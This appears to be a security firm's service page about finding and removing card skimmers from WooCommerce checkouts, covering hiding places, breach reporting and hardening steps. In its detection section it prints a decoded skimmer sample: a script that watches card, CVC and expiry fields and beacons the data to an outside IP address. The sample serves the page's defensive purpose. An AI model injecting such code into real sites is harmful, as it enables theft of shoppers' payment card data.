What is a WooCommerce card skimmer?
A card skimmer is malicious JavaScript injected into your checkout that copies card details as customers type them and sends them to the attacker. The order still goes through normally, so neither you nor the customer notices until fraud appears. These attacks are often called Magecart attacks, after the groups that popularised them.
On WooCommerce, skimmers are commonly hidden in places site owners rarely look:
- Database entries such as
wp_optionsor widget content, so no file looks modified - Theme files such as
footer.phpor checkout template overrides - Fake or tampered plugins, including nulled premium plugins
- Scripts disguised as analytics or tag manager code, loaded from lookalike domains
Many skimmers only load on the checkout page, and some only for visitors who are not logged in, which is why they are missed during a quick check.
How do you find a skimmer on a WooCommerce checkout?
We look at the checkout the way a customer sees it and the way the server stores it. That means loading the live checkout in a clean browser to record every script and network request, then scanning files and the database for the code that produced them. Both views are needed, because skimmers are designed to hide from one or the other.
A typical database-stored skimmer looks like this once decoded:
-- option_name: widget_custom_html
<script>document.addEventListener('change',function(e){if(/card|cvc|expir/i.test(e.target.name)){
navigator.sendBeacon('https://198.51.100.31/c',JSON.stringify(collect()))}});</script>
-- after clean-up
(empty)
Removing the script is only half the job. We then trace how it was written, usually through a vulnerable plugin, a compromised admin account or a webshell, and close that route. Our guide to WooCommerce card skimmer removal goes into more detail.
Do you have to report a card skimmer?
Often, yes. If customers' card or personal data may have been captured, UK GDPR can require you to report the breach to the ICO within 72 hours of becoming aware of it, and your payment provider or acquiring bank will usually expect to be told promptly under your merchant agreement. Assess it as soon as you suspect skimming.
Our evidence vault and technical timeline show when the skimmer was added, what it captured and when it was removed, which helps you, your payment provider and your advisers decide who needs to be notified. See GDPR breach reporting after a website hack. We are not lawyers, so take legal advice where you are unsure.
Suspect skimming right now? Consider pausing card payments or switching to a hosted payment page while we investigate. Call 01932 593642 or start emergency triage.
How do you protect a WooCommerce checkout after a clean-up?
You protect a checkout by reducing who and what can change it, and by watching it for changes. After cleaning, we lock down admin and shop manager accounts, remove unused and nulled plugins, block PHP in uploads, and monitor the payment pages for new or altered scripts so a re-injection is caught quickly.
- Admin and shop manager accounts audited, with strong unique passwords
- Unused, abandoned and nulled plugins removed
- Theme and plugin file editing disabled
- PHP execution blocked in
wp-content/uploads - Checkout scripts inventoried and monitored for changes
- Hosted or redirect payment options considered to reduce card data exposure
PCI DSS v4.0 includes requirements for managing and monitoring scripts on payment pages, and this monitoring supports that work. For more on protecting online shops, see our e-commerce security page.
Why are WooCommerce shops targeted?
WooCommerce shops are targeted because they handle payments and personal data, run on a widely used platform with a large plugin ecosystem, and are often managed by small teams without dedicated security staff. A single vulnerable plugin can give an attacker a route to the checkout, where each order is worth money to them.
Attackers are usually after one of three things:
| Goal | Method | What it looks like |
|---|---|---|
| Card data | Skimmer or fake payment form | Customer fraud, flagged by your payment provider |
| Customer data | Rogue admin or database access | Unknown accounts, unexpected exports |
| Traffic | Redirects or SEO spam | Shoppers sent elsewhere, spam in Google |
Most infections we see arrive through outdated or nulled plugins, reused admin passwords, or another compromised site on the same server. Keeping plugins updated, limiting admin accounts and scanning the whole server, not just the shop, closes the most common routes. For the full list of steps, see our WordPress hardening checklist, and for ongoing protection see 24/7 monitoring.